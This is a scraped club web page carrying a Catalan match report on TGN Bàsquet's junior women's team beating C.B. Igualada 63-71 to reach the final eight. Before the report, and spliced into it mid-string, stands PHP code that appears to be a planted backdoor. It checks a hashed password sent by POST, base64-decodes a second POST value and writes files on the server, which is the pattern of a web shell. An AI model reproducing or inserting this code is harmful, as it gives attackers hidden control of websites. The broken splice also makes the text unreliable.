function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior preferent aconsegueix el passi a la final a 8 guanyant al C.B. Igualada (63-71) - Tgn Bàsquet Club -

El júnior preferent aconsegueix el passi a la final a 8 guanyant al C.B. Igualada (63-71)

Updated: maig 19, 2021

L’equip Júnior Preferent s’enduu el matx gràcies al seu encert exterior vers el C.B. Igualada. En un partit molt igualat, les liles no van trobar-se còmodes en defensa, amb bastantes errades que van impedir agafar distància al marcador. Les locals van plantejar des d’un bon inici una defensa molt tancada, dificultant el camí a cistella. Així i tot, les tarragonines van trobar encert en el tir exterior, sobretot des de la línia de 6,75, encistellant fins a 7 triples i amb un parcial de 13-22 al segon període. Tornant del descans, i amb una renda de 13 punts a favor, el partit es desenvolupa seguint la dinàmica de la primera part: encert exterior i errades en defensa. Els últims 10 minuts del matx van estar marcats per aquest últim factor, propiciant un parcial favorable a les locals de 20-11. Les liles, però, van seguir amb el seu encert exterior i van sumar 4 tirs de tres més que van acabar decidint el resultat final.

Últim matx d’aquesta segona fase de Preferent B del grup format pel Bàsquet Samà, el C.B. Igualada i el TGN Bàsquet. El Júnior femení Preferent del TGN finalitza primer, ja que han guanyat tots els partits disputats, aconseguint així un bitllet directe per a la final a 8 d’aquesta categoria. Aquesta fase final tindrà lloc el cap de setmana del 19 i 20 de juny, on es jugarà l’eliminatòria prèvia el primer dia i la semifinal i final el diumenge. Desconeixem encara l’equip contra el que s’enfrontarà, ja que encara queden jornades per disputar en els altres grups.